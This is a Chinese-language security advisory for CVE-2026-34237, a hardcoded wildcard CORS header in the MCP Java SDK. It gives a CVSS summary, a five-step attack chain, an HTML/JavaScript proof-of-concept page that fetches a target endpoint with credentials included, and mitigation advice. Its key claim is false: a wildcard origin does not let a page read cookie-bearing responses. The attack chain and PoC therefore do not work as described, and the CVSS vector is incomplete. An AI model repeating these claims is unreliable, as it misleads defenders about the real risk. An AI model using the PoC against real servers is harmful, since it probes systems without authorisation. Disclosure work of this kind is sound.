CVE-2026-34237: MCP Java SDK硬编码CORS漏洞

漏洞信息

漏洞编号

CVE-2026-34237

漏洞类型

CORS配置错误

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MCP Java SDK

漏洞概述

MCP Java SDK是Model Context Protocol的官方Java开发工具包。在1.0.1和1.1.1版本之前，该SDK存在严重的安全配置缺陷。由于代码中硬编码了通配符（*）的CORS（跨域资源共享）响应头，导致服务器允许来自任意域的跨源请求。攻击者可利用此漏洞绕过同源策略限制，诱导受害者访问恶意网站，进而窃取用户敏感数据或执行未授权操作。官方已在1.0.1和1.1.1版本中修复了此问题。

技术细节

该漏洞是典型的CORS配置错误问题，源于MCP Java SDK在处理HTTP传输时缺乏灵活的安全策略配置。在受影响的代码文件（如`HttpServletSseServerTransportProvider.java`）中，开发者直接将`Access-Control-Allow-Origin`响应头硬编码为通配符`*`，这等同于向所有网络来源开放了跨域访问权限。根据CVSS 3.1评分向量（AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L），攻击者无需特殊权限即可利用此漏洞。攻击场景通常涉及社会工程学，攻击者诱导已登录受害系统的用户访问恶意网页。由于受害者的浏览器会携带相关凭证（如Cookie）自动发送请求，漏洞服务器在收到请求后，因配置错误会返回带有允许跨域标识的响应。这使得恶意网页的前端JavaScript能够绕过同源策略（SOP）读取服务器返回的敏感数据，甚至利用用户的身份执行未授权的操作，造成数据泄露或完整性破坏。

攻击链分析

STEP 1

步骤1：发现漏洞

攻击者确认目标服务器使用了存在漏洞的MCP Java SDK版本（< 1.0.1 或 < 1.1.1），并检测到响应头中包含 Access-Control-Allow-Origin: *。

STEP 2

步骤2：构建恶意页面

攻击者编写一个包含恶意JavaScript代码的HTML页面，该代码旨在向目标服务器发起跨域HTTP请求。

STEP 3

步骤3：诱导用户访问

通过钓鱼邮件或其他社会工程学手段，诱导已登录目标系统的用户访问攻击者控制的恶意页面。

STEP 4

步骤4：发起跨域请求

当用户浏览器加载恶意页面时，JavaScript代码自动向目标服务器发送请求。由于用户已认证，浏览器会携带用户的Session Cookie。

STEP 5

步骤5：窃取数据

目标服务器响应请求并附带错误的CORS头（允许通配符源）。浏览器允许恶意页面读取响应内容，导致敏感数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-34237: Hardcoded Wildcard CORS Vulnerability
This script attempts to fetch data from a vulnerable MCP Java SDK server.
-->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-34237 PoC</title>
</head>
<body>
    <h2>Testing CORS Misconfiguration</h2>
    <script>
        // Replace with the actual target URL of the vulnerable MCP SDK endpoint
        var targetUrl = 'http://vulnerable-server:8080/sse';
        
        fetch(targetUrl, {
            method: 'GET',
            credentials: 'include' // Include cookies if available
        })
        .then(response => {
            if (response.ok) {
                return response.text();
            }
            throw new Error('Network response was not ok.');
        })
        .then(data => {
            console.log('CORS Exploit Successful! Data received:');
            console.log(data);
            alert('Data leaked: ' + data.substring(0, 100) + '...');
        })
        .catch(error => {
            console.error('Exploit failed:', error);
            alert('Exploit failed. Check console for details.');
        });
    </script>
</body>
</html>

影响范围

MCP Java SDK < 1.0.1

MCP Java SDK < 1.1.1

防御指南

临时缓解措施

如果无法立即升级SDK，建议在应用网关或反向代理（如Nginx、Apache）层面配置严格的CORS策略，覆盖后端应用返回的不安全头信息，明确指定允许访问的Origin，并拒绝携带通配符的请求。